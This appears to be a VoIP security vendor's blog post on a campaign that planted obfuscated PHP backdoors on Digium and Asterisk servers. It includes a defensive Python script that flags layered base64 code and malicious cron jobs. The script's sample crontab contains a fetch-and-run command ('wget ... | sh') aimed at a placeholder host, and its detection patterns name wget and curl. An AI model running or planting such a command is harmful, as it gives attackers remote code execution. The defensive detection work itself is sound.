Large-scale targeted attacks are becoming a widespread issue for many US-based companies, and no one is safe from the possibility of becoming the next victim.

Voice over Internet Protocol (VoIP) phone systems using the Digium software are just the latest target of an attack campaign.

The hackers put code on the targeted servers that is designed to exfiltrate data via downloading and to perform additional tasks for the hackers. In more technical terms, according to Palo Alto Networks’ security team Unit 42, “[this] malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system.”

The hack of the Digium VoIP software is not the first of its kind in recent months. An uptick in unusual activity is said to have begun in mid-December 2021, when bad actors targeted Asterisk, a commonly used piece of software that runs on the open-source Elastix Unified Communications Server. Unit 42 reports witnessing more than 500,000 unique samples over the period spanning from December 2021 to March 2022.

According to Unit 42, the newest invasion of the Digium software resembles a prior attack in November 2020, called the INJ3CTOR3 campaign. The malware is also used to maintain a backdoor into the system, which the attackers can use to steal other information.

The tactic these hackers have used to infiltrate the Digium software is not a new one, and experts do not see it stopping anytime soon.

To be clear, no phone system (or any other system) that we’ve ever seen is inherently secure or immune to attack. The Asterisk phone system software is very popular, as is its commercial version, Digium.

If your company relies on Digium or Asterisk-based phone systems, there are ways to protect them, and we encourage you to have a full security check completed as soon as possible on your phone system.

Any system that is possibly connected to the internet should regularly be audited for security issues, protected with all possible and appropriate protections, and kept up to date with the latest security patches.
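As a starting point for such an audit, here is a defender-side triage sketch for the behaviors Unit 42 describes above: it counts stacked base64 layers in PHP source and flags scheduled tasks that download and run remote content. This is an added example, not code from Unit 42 or this post; the regex lists, the two-layer threshold, the file paths and all sample data are assumptions constructed for illustration.

```python
import base64
import re

# Heuristic indicator lists (assumptions for this example, not published IoCs).
WRAPPERS = re.compile(r"\b(eval|assert|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/=]{16,})["']""")
FETCH = re.compile(r"\b(wget|curl)\b", re.I)
EXEC = re.compile(r"\|\s*(sh|bash|php)\b", re.I)

def obfuscation_layers(php_source, max_layers=10):
    """Peel base64 string literals while the text still calls a decoder/executor."""
    text, layers = php_source, 0
    while layers < max_layers and WRAPPERS.search(text):
        literal = max(B64_LITERAL.findall(text), key=len, default=None)
        if literal is None:
            break
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 after all
            break
        layers += 1
    return layers

def suspicious_cron_lines(crontab_text):
    """Return active cron entries that fetch remote content and pipe it to an interpreter."""
    lines = (l.strip() for l in crontab_text.splitlines())
    return [l for l in lines
            if l and not l.startswith("#") and FETCH.search(l) and EXEC.search(l)]

def triage(php_files, crontab_text, min_layers=2):
    """php_files maps path -> source text; returns findings for manual review."""
    flagged = {p: n for p, s in php_files.items()
               if (n := obfuscation_layers(s)) >= min_layers}
    return {"php": flagged, "cron": suspicious_cron_lines(crontab_text)}

def _wrap(php):  # builds one encoding layer around harmless constructed PHP
    return 'eval(base64_decode("%s"));' % base64.b64encode(php.encode()).decode()
# Constructed sample data: a harmless echo wrapped twice, and a made-up crontab.
SAMPLE_FILES = {
    "/var/www/html/index.php": '<?php echo "hello"; ?>',
    "/var/www/html/cfg.php": "<?php " + _wrap(_wrap('echo "constructed sample";')) + " ?>",
}
SAMPLE_CRON = """# constructed crontab
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q -O - http://example.invalid/a | sh
"""

if __name__ == "__main__":
    print(triage(SAMPLE_FILES, SAMPLE_CRON))
```

Findings from heuristics like these are leads for manual review, not proof of compromise; legitimate software also uses base64 and scheduled downloads.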

If you need help with your Digium, Asterisk, or any other VoIP phone system or to talk with our security team about conducting a security review of your systems, you can set up a confidential free consult with our security team by calling us today at 225-224-6595.
